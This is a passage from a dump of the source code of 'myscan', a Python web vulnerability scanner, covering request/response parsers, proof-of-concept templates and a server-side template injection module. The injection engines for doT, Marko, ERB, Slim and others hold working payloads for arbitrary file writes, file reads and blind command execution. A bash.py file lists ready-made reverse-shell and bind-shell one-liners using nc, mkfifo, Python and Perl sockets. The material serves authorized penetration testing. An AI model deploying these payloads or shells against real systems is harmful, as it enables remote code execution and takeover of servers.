ex: 24 | traceback.print_exc() 25 | logger.warning("input target to hostdata get error:{}".format(ex)) 26 | -------------------------------------------------------------------------------- /myscan/lib/parse/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan/lib/parse/__init__.py -------------------------------------------------------------------------------- /myscan/lib/parse/response_parser.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : response_parser.py 5 | 6 | from urllib import parse 7 | 8 | 9 | class response_parser(): 10 | ''' 11 | 此类解析处理rqeuests返回的的respose类 12 | ''' 13 | 14 | def __init__(self, r): 15 | self.data = r 16 | 17 | def getrequestraw(self): 18 | ''' 19 | return bytes[] 20 | ''' 21 | request_raw = "{} {} HTTP/1.1\r\n".format(self.data.request.method, self.data.request.path_url).encode() 22 | if self.data.request.headers.get("Host", None) is None: 23 | host = parse.urlparse(self.data.url).netloc 24 | request_raw += "Host: {}\r\n".format(host).encode() 25 | for k, v in self.data.request.headers.items(): 26 | request_raw += "{}: {}\r\n".format(k, v).encode() 27 | 28 | request_raw += b"\r\n" 29 | if self.data.request.body: 30 | if isinstance(self.data.request.body, str): 31 | request_raw += self.data.request.body.encode(errors="ignore") 32 | else: 33 | request_raw += self.data.request.body 34 | return request_raw 35 | 36 | def getresponseraw(self): 37 | ''' 38 | return bytes[] 39 | ''' 40 | response_raw = "HTTP/1.1 {} {}\r\n".format(self.data.status_code, self.data.reason).encode() 41 | for k, v in self.data.headers.items(): 42 | response_raw += "{}: {}\r\n".format(k, v).encode() 43 | response_raw += b"\r\n" 44 | response_raw += self.data.content 45 | return response_raw 46 | 47 | def geturl(self): 48 | return self.data.url.split("?")[0] 49 | -------------------------------------------------------------------------------- /myscan/lib/patch/ipv6_patch.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/9/19 3 | # @Author : caicai 4 | # @File : ipv6_patch.py 5 | 6 | import socket 7 | import urllib3 8 | from myscan.lib.core.data import cmd_line_options, logger 9 | 10 | 11 | def allowed_gai_family(): 12 | family = socket.AF_INET 13 | if cmd_line_options.ipv6: 14 | logger.debug("Using ipv6 priority") 15 | family = socket.AF_UNSPEC 16 | return family 17 | 18 | 19 | def ipv6_patch(): 20 | urllib3.util.connection.allowed_gai_family = allowed_gai_family 21 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-20 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-20 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/closures.py: -------------------------------------------------------------------------------- 1 | # Shared closures 2 | 3 | close_single_duble_quotes = [ '1\'', '1"' ] 4 | integer = [ '1' ] 5 | string = [ '"1"' ] 6 | close_dict = [ '}', ':1}' ] 7 | close_function = [ ')' ] 8 | close_list = [ ']' ] 9 | empty = [ '' ] 10 | 11 | # Python triple quotes and if and for loop termination. 12 | close_triple_quotes = [ '1"""' ] 13 | if_loops = [ ':' ] 14 | 15 | # Javascript needs this to bypass assignations 16 | var = [ 'a' ] 17 | 18 | # Java needs booleans to bypass conditions and iterable objects 19 | true_var = [ 'true' ] 20 | iterable_var = [ '[1]' ] -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/const.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-20 3 | # @Author : caicai 4 | # @File : const.py 5 | from myscan.lib.core.common import get_random_num 6 | rand_long1=get_random_num(10) 7 | rand_long2=get_random_num(10) 8 | rand1=get_random_num(3) 9 | rand2=get_random_num(3) 10 | rand3=get_random_num(3) 11 | jinja2={ 12 | 'render' : { 13 | 'render': '{{%(code)s}}', 14 | 'header': '{{%(header)s}}', 15 | 'trailer': '{{%(trailer)s}}', 16 | 'test_render': '(%(n1)s,%(n2)s*%(n3)s)' % { 17 | 'n1' : rand1, 18 | 'n2' : rand2, 19 | 'n3' : rand3 20 | }, 21 | 'test_render_expected': '%(res)s' % { 22 | 'res' : (rand1,rand2*rand3) 23 | } 24 | }, 25 | } 26 | 27 | def generate_payload(): 28 | payloads=[] 29 | for render in [jinja2]: 30 | r_=render.get("render") 31 | p=r_.get("header")%({"header":rand_long1})+r_.get("render")%({"code":r_.get("test_render")})+r_.get("trailer")%({"trailer":rand_long2}) 32 | payloads.append( 33 | (p,r_.get("test_render_expected")) 34 | ) 35 | return payloads 36 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/engines/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-20 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/engines/dot.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.scriptlib.ssti.languages import javascript 2 | 3 | 4 | class Dot(javascript.Javascript): 5 | 6 | def init(self): 7 | 8 | self.update_actions({ 9 | 'render' : { 10 | 'render': '{{=%(code)s}}', 11 | 'header': '{{=%(header)s}}', 12 | 'trailer': '{{=%(trailer)s}}' 13 | }, 14 | 'write' : { 15 | 'call' : 'inject', 16 | 'write' : """{{=global.scan.mainModule.require('fs').appendFileSync('%(path)s', Buffer('%(chunk_b64)s', 'base64'), 'binary')}}""", 17 | 'truncate' : """{{=global.scan.mainModule.require('fs').writeFileSync('%(path)s', '')}}""" 18 | }, 19 | 'read' : { 20 | 'call': 'evaluate', 21 | 'read' : """global.scan.mainModule.require('fs').readFileSync('%(path)s').toString('base64');""" 22 | }, 23 | 'md5' : { 24 | 'call': 'evaluate', 25 | 'md5': """global.scan.mainModule.require('crypto').createHash('md5').update(global.scan.mainModule.require('fs').readFileSync('%(path)s')).digest("hex");""" 26 | }, 27 | 'evaluate' : { 28 | 'test_os': """global.scan.mainModule.require('os').platform()""", 29 | }, 30 | 'execute' : { 31 | 'call': 'evaluate', 32 | 'execute': """global.scan.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString());""" 33 | }, 34 | 'execute_blind' : { 35 | # The bogus prefix is to avoid false detection of Javascript instead of doT 36 | 'call': 'inject', 37 | 'execute_blind': """{{=''}}{{global.scan.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i');}}""" 38 | }, 39 | }) 40 | 41 | self.set_contexts([ 42 | 43 | # Text context, no closures 44 | { 'level': 0 }, 45 | 46 | { 'level': 1, 'prefix': '%(closure)s;}}', 'suffix' : '{{1;', 'closures' : javascript.ctx_closures }, 47 | 48 | ]) 49 | 50 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/engines/erb.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.scriptlib.ssti.languages import ruby 2 | 3 | 4 | class Erb(ruby.Ruby): 5 | 6 | def init(self): 7 | 8 | self.update_actions({ 9 | 'render' : { 10 | 'render': '"#{%(code)s}"', 11 | 'header': """<%%= '%(header)s'+""", 12 | 'trailer': """+'%(trailer)s' %%>""", 13 | }, 14 | 'write' : { 15 | 'call' : 'inject', 16 | 'write': """<%%= require'base64';File.open('%(path)s', 'ab+') {|f| f.write(Base64.urlsafe_decode64('%(chunk_b64)s')) } %%>""", 17 | 'truncate' : """<%%= File.truncate('%(path)s', 0) %%>""" 18 | }, 19 | 'evaluate_blind' : { 20 | 'call': 'inject', 21 | 'evaluate_blind': """<%%= require'base64';eval(Base64.urlsafe_decode64('%(code_b64)s'))&&sleep(%(delay)i) %%>""" 22 | }, 23 | 'execute_blind' : { 24 | 'call': 'inject', 25 | 'execute_blind': """<%%= require'base64';%%x(#{Base64.urlsafe_decode64('%(code_b64)s')+' && sleep %(delay)i'}) %%>""" 26 | }, 27 | }) 28 | 29 | self.set_contexts([ 30 | 31 | # Text context, no closures 32 | { 'level': 0 }, 33 | 34 | # TODO: add contexts 35 | ]) 36 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/engines/mako.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.scriptlib.ssti.languages import python 2 | 3 | 4 | class Mako(python.Python): 5 | 6 | def init(self): 7 | 8 | self.update_actions({ 9 | 'render' : { 10 | 'render': '${%(code)s}', 11 | 'header': '${%(header)s}', 12 | 'trailer': '${%(trailer)s}' 13 | }, 14 | }) 15 | 16 | self.set_contexts([ 17 | 18 | # Text context, no closures 19 | { 'level': 0 }, 20 | 21 | # Normal reflecting tag ${} 22 | { 'level': 1, 'prefix': '%(closure)s}', 'suffix' : '', 'closures' : python.ctx_closures }, 23 | 24 | # Code blocks 25 | # This covers <% %s %>, <%! %s %>, <% %s=1 %> 26 | { 'level': 1, 'prefix': '%(closure)s%%>', 'suffix' : '<%%#', 'closures' : python.ctx_closures }, 27 | 28 | # If and for blocks 29 | # % if %s:\n% endif 30 | # % for a in %s:\n% endfor 31 | { 'level': 5, 'prefix': '%(closure)s#\n', 'suffix' : '\n', 'closures' : python.ctx_closures }, 32 | 33 | # Mako blocks 34 | { 'level': 5, 'prefix' : '', 'suffix' : '<%%doc>' }, 35 | { 'level': 5, 'prefix' : '', 'suffix' : '<%%def name="t(x)">', 'closures' : python.ctx_closures }, 36 | { 'level': 5, 'prefix' : '', 'suffix' : '<%%block>', 'closures' : python.ctx_closures }, 37 | { 'level': 5, 'prefix' : '', 'suffix' : '<%%text>', 'closures' : python.ctx_closures}, 38 | 39 | ]) -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/engines/marko.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.scriptlib.ssti.languages import javascript 2 | 3 | 4 | 5 | class Marko(javascript.Javascript): 6 | 7 | def init(self): 8 | 9 | self.update_actions({ 10 | 'render' : { 11 | 'render': '${%(code)s}', 12 | 'header': '${"%(header)s"}', 13 | 'trailer': '${"%(trailer)s"}', 14 | }, 15 | 'write' : { 16 | 'call' : 'inject', 17 | 'write' : """${require('fs').appendFileSync('%(path)s',Buffer('%(chunk_b64)s','base64'),'binary')}""", 18 | 'truncate' : """${require('fs').writeFileSync('%(path)s','')}""" 19 | }, 20 | 'execute_blind' : { 21 | 'call': 'inject', 22 | 'execute_blind': """${require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i')}""" 23 | }, 24 | }) 25 | 26 | self.set_contexts([ 27 | 28 | # Text context, no closures 29 | { 'level': 0 }, 30 | 31 | { 'level': 1, 'prefix': '%(closure)s}', 'suffix' : '${"1"', 'closures' : javascript.ctx_closures }, 32 | 33 | # If escapes require to know the ending tag e.g.
34 | 35 | # This to escape from and 36 | { 'level': 2, 'prefix': '1/>', 'suffix' : '' }, 37 | 38 | ]) 39 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/engines/slim.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.scriptlib.ssti.languages import ruby 2 | 3 | 4 | 5 | class Slim(ruby.Ruby): 6 | 7 | def init(self): 8 | 9 | self.update_actions({ 10 | 'render' : { 11 | 'render': '"#{%(code)s}"', 12 | 'header': """=('%(header)s'+""", 13 | 'trailer': """+'%(trailer)s')""", 14 | }, 15 | 'write' : { 16 | 'call' : 'inject', 17 | 'write': """=(require'base64';File.open('%(path)s', 'ab+') {|f| f.write(Base64.urlsafe_decode64('%(chunk_b64)s')) })""", 18 | 'truncate' : """=(File.truncate('%(path)s', 0))""" 19 | }, 20 | 'evaluate_blind' : { 21 | 'call': 'inject', 22 | 'evaluate_blind': """=(require'base64';eval(Base64.urlsafe_decode64('%(code_b64)s'))&&sleep(%(delay)i))""" 23 | }, 24 | 'execute_blind' : { 25 | 'call': 'inject', 26 | 'execute_blind': """=(require'base64';%%x(#{Base64.urlsafe_decode64('%(code_b64)s')+' && sleep %(delay)i'}))""" 27 | }, 28 | }) 29 | 30 | self.set_contexts([ 31 | 32 | # Text context, no closures 33 | { 'level': 0 }, 34 | 35 | # TODO: add contexts 36 | 37 | ]) 38 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/engines/tornado.py: -------------------------------------------------------------------------------- 1 | from myscan.lib.scriptlib.ssti.languages import python 2 | 3 | 4 | from myscan.lib.scriptlib.ssti import rand 5 | 6 | class Tornado(python.Python): 7 | 8 | def init(self): 9 | 10 | self.update_actions({ 11 | 'render' : { 12 | 'render': '{{%(code)s}}', 13 | 'header': '{{%(header)s}}', 14 | 'trailer': '{{%(trailer)s}}', 15 | 'test_render': """'%(s1)s'}}{%% raw '%(s1)s'.join('%(s2)s') %%}{{'%(s2)s'""" % { 16 | 's1' : rand.randstrings[0], 17 | 's2' : rand.randstrings[1] 18 | }, 19 | 'test_render_expected': '%(res)s' % { 20 | 'res' : rand.randstrings[0] + rand.randstrings[0].join(rand.randstrings[1]) + rand.randstrings[1] 21 | } 22 | } 23 | }) 24 | 25 | self.set_contexts([ 26 | 27 | # Text context, no closures 28 | { 'level': 0 }, 29 | 30 | # This covers {{%s}} 31 | { 'level': 1, 'prefix': '%(closure)s}}', 'suffix' : '', 'closures' : python.ctx_closures }, 32 | 33 | # This covers {% %s %} 34 | { 'level': 1, 'prefix': '%(closure)s%%}', 'suffix' : '', 'closures' : python.ctx_closures }, 35 | 36 | # Comment blocks 37 | { 'level': 5, 'prefix' : '#}', 'suffix' : '{#' }, 38 | ]) 39 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/importssti.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-04-21 3 | # @Author : caicai 4 | # @File : importssti.py 5 | 6 | 7 | from myscan.lib.scriptlib.ssti.engines.jinja2 import Jinja2 8 | from myscan.lib.scriptlib.ssti.engines.dot import Dot 9 | from myscan.lib.scriptlib.ssti.engines.twig import Twig 10 | from myscan.lib.scriptlib.ssti.engines.ejs import Ejs 11 | from myscan.lib.scriptlib.ssti.engines.erb import Erb 12 | from myscan.lib.scriptlib.ssti.engines.mako import Mako 13 | from myscan.lib.scriptlib.ssti.engines.marko import Marko 14 | from myscan.lib.scriptlib.ssti.engines.nunjucks import Nunjucks 15 | from myscan.lib.scriptlib.ssti.engines.pug import Pug 16 | from myscan.lib.scriptlib.ssti.engines.slim import Slim 17 | from myscan.lib.scriptlib.ssti.engines.smarty import Smarty 18 | from myscan.lib.scriptlib.ssti.engines.tornado import Tornado 19 | from myscan.lib.scriptlib.ssti.engines.velocity import Velocity 20 | from myscan.lib.scriptlib.ssti.engines.freemarker import Freemarker 21 | from myscan.lib.scriptlib.ssti.engines.dust import Dust 22 | from myscan.lib.scriptlib.ssti.languages.javascript import Javascript 23 | from myscan.lib.scriptlib.ssti.languages.php import Php 24 | from myscan.lib.scriptlib.ssti.languages.python import Python 25 | from myscan.lib.scriptlib.ssti.languages.ruby import Ruby 26 | from myscan.lib.core.data import others,logger 27 | 28 | plugins = [ 29 | Smarty, 30 | Mako, 31 | Python, 32 | Tornado, 33 | Jinja2, 34 | Twig, 35 | Freemarker, 36 | Velocity, 37 | Slim, 38 | Erb, 39 | Pug, 40 | Nunjucks, 41 | Dot, 42 | Dust, 43 | Marko, 44 | Javascript, 45 | Php, 46 | Ruby, 47 | Ejs 48 | ] 49 | 50 | def importssti(): 51 | try: 52 | test_payloads=[] 53 | for plugin in plugins: 54 | current_plugin = plugin() 55 | test_payloads+=current_plugin.generate_payloads() 56 | others.ssti_payloads=test_payloads 57 | # logger.debug("import ssti payloads success") 58 | except Exception as ex: 59 | logger.warning("import ssti payloads error:{}".format(ex)) 60 | 61 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/languages/bash.py: -------------------------------------------------------------------------------- 1 | 2 | echo = """echo '%(s1)s'""" 3 | 4 | bind_shell = [ 5 | """python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", %(port)s));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("%(shell)s");s.close()'""", 6 | """nc -l -p %(port)s -e %(shell)s""", 7 | """rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|%(shell)s -i 2>&1|nc -l %(port)s >/tmp/f; rm -rf /tmp/f""", 8 | """socat tcp-l:%(port)s exec:%(shell)s""" 9 | ] 10 | 11 | reverse_shell = [ 12 | """sleep 1; rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|%(shell)s -i 2>&1|nc %(host)s %(port)s >/tmp/f""", 13 | """sleep 1; nc -e %(shell)s %(host)s %(port)s""", 14 | """sleep 1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%(host)s",%(port)s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["%(shell)s","-i"]);'""", 15 | "sleep 1; /bin/bash -c \'%(shell)s 0&0 2>&0\'", 16 | """perl -e 'use Socket;$i="%(host)s";$p=%(port)s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("%(shell)s -i");};'""", 17 | # TODO: ruby payload's broken, fix it. 18 | # """ruby -rsocket -e'f=TCPSocket.open("%(host)s",%(port)s).to_i;exec sprintf("%(shell)s -i <&%%d >&%%d 2>&%%d",f,f,f)'""", 19 | """sleep 1; python -c 'import socket,pty,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%(host)s",%(port)s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("%(shell)s");'""", 20 | ] -------------------------------------------------------------------------------- /myscan/lib/scriptlib/ssti/rand.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | 4 | def randint_n(n): 5 | 6 | # If the length is 1, starts from 2 to avoid 7 | # number repetition on evaluation e.g. 1*8=8 8 | # creating false positives 9 | 10 | if n == 1: 11 | range_start = 2 12 | else: 13 | range_start = 10**(n-1) 14 | 15 | range_end = (10**n)-1 16 | return random.randint(range_start, range_end) 17 | 18 | def randstr_n(n, chars=string.ascii_letters + string.digits): 19 | return ''.join( 20 | random.choice(chars) for _ in range(n) 21 | ) 22 | 23 | # Generate static random integers 24 | # to help filling actions['render'] 25 | randints = [ 26 | randint_n(3) for n in range(3) 27 | ] 28 | 29 | # Generate static random integers 30 | # to help filling actions['render'] 31 | randstrings = [ 32 | randstr_n(3) for n in range(3) 33 | ] 34 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/xss/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-20 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | -------------------------------------------------------------------------------- /myscan/lib/scriptlib/xss/jsContexter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-20 3 | # @Author : caicai 4 | # @File : jsContexter.py 5 | 6 | import re 7 | 8 | from myscan.lib.scriptlib.xss.const import xsschecker 9 | 10 | 11 | def stripper(string, substring, direction='right'): 12 | done = False 13 | strippedString = '' 14 | if direction == 'right': 15 | string = string[::-1] 16 | for char in string: 17 | if char == substring and not done: 18 | done = True 19 | else: 20 | strippedString += char 21 | if direction == 'right': 22 | strippedString = strippedString[::-1] 23 | return strippedString 24 | 25 | 26 | def jsContexter(script): 27 | broken = script.split(xsschecker) 28 | pre = broken[0] 29 | # remove everything that is between {..}, "..." or '...' 30 | pre = re.sub(r'(?s)\{.*?\}|(?s)\(.*?\)|(?s)".*?"|(?s)\'.*?\'', '', pre) 31 | breaker = '' 32 | num = 0 33 | for char in pre: # iterate over the remaining characters 34 | if char == '{': 35 | breaker += '}' 36 | elif char == '(': 37 | breaker += ';)' # yes, it should be ); but we will invert the whole thing later 38 | elif char == '[': 39 | breaker += ']' 40 | elif char == '/': 41 | try: 42 | if pre[num + 1] == '*': 43 | breaker += '/*' 44 | except IndexError: 45 | pass 46 | elif char == '}': # we encountered a } so we will strip off "our }" because this one does the job 47 | breaker = stripper(breaker, '}') 48 | elif char == ')': # we encountered a ) so we will strip off "our }" because this one does the job 49 | breaker = stripper(breaker, ')') 50 | elif breaker == ']': # we encountered a ] so we will strip off "our }" because this one does the job 51 | breaker = stripper(breaker, ']') 52 | num += 1 53 | return breaker[::-1] # invert the breaker string 54 | -------------------------------------------------------------------------------- /myscan/plugins/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/plugins/hostscan/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/plugins/webscan/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /myscan/pocs/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-06-13 3 | # @Author : caicai 4 | # @File : __init__.py.py 5 | -------------------------------------------------------------------------------- /myscan/pocs/perfile/__template.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : __template.py 5 | 6 | # 此脚本为编写perfile的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 7 | from myscan.lib.parse.dictdata_parser import dictdata_parser # 写了一些操作dictdata的方法的类 8 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 9 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 10 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 11 | 12 | 13 | class POC(): 14 | def __init__(self, workdata): 15 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 16 | self.url = workdata.get( 17 | "data") # self.url为需要测试的url,但不会包含url参数,如https://www.baidu.com/index.php#tip1 .不会携带url参数,如?keyword=1 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "your poc name" 20 | self.vulmsg = "your poc detail msg" 21 | self.level = 1 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | pass 25 | self.result.append({ 26 | "name": self.name, 27 | "url": "http://example.com/test.php", 28 | "level": self.level, # 0:Low 1:Medium 2:High 29 | "detail": { 30 | "vulmsg": self.vulmsg, 31 | } 32 | }) 33 | -------------------------------------------------------------------------------- /myscan/pocs/perfile/myscan_getpage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : myscan_getpage.py 5 | 6 | ''' 7 | 勿删除此脚本,此脚本不会有任何漏洞输出,目的是通过封装的request,GET请求文件,search模块去搜索响应包,让search模块输出漏洞。 8 | ''' 9 | from myscan.lib.helper.request import request 10 | 11 | class POC(): 12 | def __init__(self, workdata): 13 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 14 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 15 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 16 | self.name = "your poc name" 17 | self.level = 1 # 0:Low 1:Medium 2:High 18 | 19 | def verify(self): 20 | req = { 21 | "method": "GET", 22 | "url": self.url, 23 | "headers": self.dictdata.get("request").get("headers"), 24 | "timeout": 10, 25 | "verify": False, 26 | "allow_redirects": True, 27 | } 28 | r = request(**req) 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /myscan/pocs/perfile/myscan_webpack_leak.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-22 3 | # @Author : caicai 4 | # @File : myscan_webpack_leak.py 5 | 6 | from myscan.lib.parse.dictdata_parser import dictdata_parser # 写了一些操作dictdata的方法的类 7 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 8 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 9 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 10 | 11 | 12 | class POC(): 13 | def __init__(self, workdata): 14 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 15 | self.url = workdata.get( 16 | "data") # self.url为需要测试的url,但不会包含url参数,如https://www.baidu.com/index.php#tip1 .不会携带url参数,如?keyword=1 17 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 18 | self.name = "webpack source leak" 19 | self.vulmsg = "webpack源文件泄漏,可尝试reverse-sourcemap还原" 20 | self.level = 1 # 0:Low 1:Medium 2:High 21 | 22 | def verify(self): 23 | if self.dictdata.get("url").get("extension").lower() not in ["js"]: 24 | return 25 | req = { 26 | "url": self.url + ".map", 27 | "method": "GET", 28 | "verify": False, 29 | "allow_redirects": False, 30 | "timeout": 10, 31 | } 32 | r = request(**req) 33 | if r != None and b"webpack:///" in r.content: 34 | # parser_ = response_parser(r) 35 | self.result.append({ 36 | "name": self.name, 37 | "url": self.url, 38 | "level": self.level, # 0:Low 1:Medium 2:High 39 | "detail": { 40 | "vulmsg": self.vulmsg, 41 | # "request": parser_.getrequestraw(), 42 | # "response": parser_.getresponseraw() 43 | } 44 | }) 45 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020/8/19 3 | # @Author : caicai 4 | # @File : __init__.py.py -------------------------------------------------------------------------------- /myscan/pocs/perfolder/__poc_dedecms-cve-2018-7700-rce_2018.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # @Time : 2020-05-10 3 | # @Author : caicai 4 | # @File : __poc_dedecms-cve-2018-6910_2018.py 5 | 6 | '未验证' 7 | 8 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 9 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 10 | from myscan.config import scan_set 11 | from myscan.lib.core.common import get_random_str 12 | 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "dedecms-cve-2018-6910" 20 | self.vulmsg = '''referer:https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md''' 21 | self.level = 2 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | req = { 28 | "method": "GET", 29 | "url": self.url + "include/downmix.inc.php", 30 | "headers": self.dictdata.get("request").get("headers"), 31 | "timeout": 10, 32 | "verify": False, 33 | "allow_redirects": False 34 | } 35 | r = request(**req) 36 | if r != None and r.status_code == 200 and b"Fatal error" in r.content and b"downmix.inc.php" in r.content and b"Call to undefined function helper()" in r.content: 37 | parser_ = response_parser(r) 38 | self.result.append({ 39 | "name": self.name, 40 | "url": parser_.geturl(), 41 | "level": self.level, # 0:Low 1:Medium 2:High 42 | "detail": { 43 | "vulmsg": self.vulmsg, 44 | "request": parser_.getrequestraw(), 45 | "response": parser_.getresponseraw() 46 | } 47 | }) 48 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/__template.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 2020-02-14 3 | # @Author : caicai 4 | # @File : __template.py 5 | 6 | # 此脚本为编写perfloder的poc模板,编写poc时复制一份此模版为pocname即可,用户可在verify方法下添加自己代码 7 | from myscan.lib.parse.dictdata_parser import dictdata_parser # 写了一些操作dictdata的方法的类 8 | from myscan.lib.parse.response_parser import response_parser ##写了一些操作resonse的方法的类 9 | from myscan.lib.helper.request import request # 修改了requests.request请求的库,建议使用此库,会在redis计数 10 | from myscan.lib.helper.helper_socket import socket_send_withssl, socket_send # 如果需要,socket的方法封装 11 | from myscan.config import scan_set 12 | 13 | 14 | class POC(): 15 | def __init__(self, workdata): 16 | self.dictdata = workdata.get("dictdata") # python的dict数据,详情请看docs/开发指南Example dict数据示例 17 | self.url = workdata.get("data") # self.url为需要测试的url,值为目录url,会以/结尾,如https://www.baidu.com/home/ ,为目录 18 | self.result = [] # 此result保存dict数据,dict需包含name,url,level,detail字段,detail字段值必须为dict。如下self.result.append代码 19 | self.name = "your poc name" 20 | self.vulmsg = "your poc detail msg" 21 | self.level = 2 # 0:Low 1:Medium 2:High 22 | 23 | def verify(self): 24 | # 根据config.py 配置的深度,限定一下目录深度 25 | if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: 26 | return 27 | self.result.append({ 28 | "name": self.name, 29 | "url": self.url, 30 | "level": self.level, # 0:Low 1:Medium 2:High 31 | "detail": { 32 | "vulmsg": self.vulmsg, 33 | "request":"", 34 | "response":"" 35 | } 36 | }) 37 | -------------------------------------------------------------------------------- /myscan/pocs/perfolder/apache/__init__.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/env python3 2 | # @Time : 